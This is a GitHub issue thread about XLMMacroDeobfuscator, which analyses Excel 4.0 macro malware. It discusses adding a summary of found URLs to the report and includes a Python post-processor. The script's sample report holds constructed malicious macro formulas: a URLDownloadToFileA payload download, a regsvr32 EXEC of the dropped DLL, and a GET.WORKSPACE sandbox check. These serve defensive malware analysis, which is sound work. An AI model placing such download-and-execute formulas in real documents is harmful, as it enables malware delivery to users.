DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)

Idea - Summary #57

Open 0ssigeno opened 3 years ago

0ssigeno commented 3 years ago

Hi, I have inserted XlmMacroDeobfuscator inside IntelOwl (https://github.com/intelowlproject/IntelOwl/pull/196) to have a better understanding of the malware campaigns that are running these days in Italy. To have a report, I'm abusing the JSON format, but the entire JSON is quite big and hard to read if you don't know what you are looking for. Would it be a good idea to have a summary of what has been found? My personal use case would be to find URLs, allowing me to easily find the document requests and the next payload to analyse. Don't get me wrong, it is easy to make a regex to find the URLs inside the report myself, but inside IntelOwl we decided to touch the tool result the least possible.
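A minimal post-processor for the use case described in this comment, written as an added example for this page (it is not part of XLMMacroDeobfuscator or IntelOwl): it walks a JSON report, collects every URL and every EXEC command found in any string value, and counts records by status. The report shape (a `records` list with `sheet`/`cell`/`status`/`formula`, a `defined_names` map, the status names) and the sample content are constructed here for illustration; because the walker visits every string regardless of key, it keeps working if the real report uses different keys.

```python
import json
import re
import sys

# Constructed sample report. Field names and status values are assumed for
# illustration only; they are not copied from a real XLMMacroDeobfuscator run.
SAMPLE_REPORT = json.dumps({
    "file_path": "sample.xls",
    "records": [
        {"sheet": "Macro1", "cell": "A1", "status": "FullEvaluation",
         "formula": r'=CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
                    r'"http://example.test/drop/payload.dll","C:\Users\Public\x.dll",0,0)'},
        {"sheet": "Macro1", "cell": "A2", "status": "FullEvaluation",
         "formula": r'=EXEC("regsvr32 -s C:\Users\Public\x.dll")'},
        {"sheet": "Macro1", "cell": "A3", "status": "PartialEvaluation",
         "formula": "=IF(GET.WORKSPACE(19),,CLOSE(TRUE))"},
    ],
    "defined_names": {
        "Auto_Open": "Macro1!$A$1",
        "cfg": '="https://cdn.example.test/second/stage.bin"',
    },
})

# Stop at quotes, whitespace and parentheses so a URL embedded as a formula
# argument does not swallow the arguments that follow it.
URL_RE = re.compile(r'https?://[^\s"\'<>()]+')
# First quoted argument of an EXEC(...) call, which is the command line.
EXEC_RE = re.compile(r'=EXEC\("([^"]*)"')


def iter_strings(obj):
    """Depth-first walk yielding every string value in a decoded JSON tree."""
    if isinstance(obj, str):
        yield obj
    elif isinstance(obj, dict):
        for value in obj.values():
            yield from iter_strings(value)
    elif isinstance(obj, list):
        for item in obj:
            yield from iter_strings(item)


def _dedupe(items):
    """Preserve first-seen order while dropping repeats."""
    seen = set()
    out = []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def extract_urls(report_json):
    """Return unique URLs found anywhere in the report, in discovery order."""
    report = json.loads(report_json)
    return _dedupe(url for s in iter_strings(report) for url in URL_RE.findall(s))


def extract_exec_commands(report_json):
    """Return unique EXEC() command lines found anywhere in the report."""
    report = json.loads(report_json)
    return _dedupe(cmd for s in iter_strings(report) for cmd in EXEC_RE.findall(s))


def summarize(report_json):
    """Compact summary: URLs, EXEC commands and a count of records per status."""
    report = json.loads(report_json)
    status_counts = {}
    for rec in report.get("records", []):
        status = rec.get("status", "unknown")
        status_counts[status] = status_counts.get(status, 0) + 1
    return {
        "urls": extract_urls(report_json),
        "exec_commands": extract_exec_commands(report_json),
        "status_counts": status_counts,
    }


if __name__ == "__main__":
    # Usage: python summarize.py report.json   (falls back to the sample)
    data = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_REPORT
    print(json.dumps(summarize(data), indent=2))
```

The regex only sees literal strings, so a URL that the macro assembles at run time from concatenated fragments is found only after the deobfuscator has evaluated the formula into a single string; records that are still in a partial or unevaluated state will not yield it.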

DissectMalware commented 3 years ago

Good idea.

Did you use the --output-level switch?


Currently, it only suppresses uninteresting XLM macros.

However, I can extend this to also remove uninteresting defined names ...

0ssigeno commented 3 years ago

I have to be honest, I did not test the --output-level, and it kinda does what I was looking for. I'm sorry to have bothered without having tested each switch.

DissectMalware commented 3 years ago

No worries. But still I think there is room to better control the output. Currently, only macros can be filtered using this switch. Maybe it is also a good idea to filter defined names, memory and file dumps. So, I will leave this issue open for improving this part of the project. Feel free to share your ideas on how we can improve this part.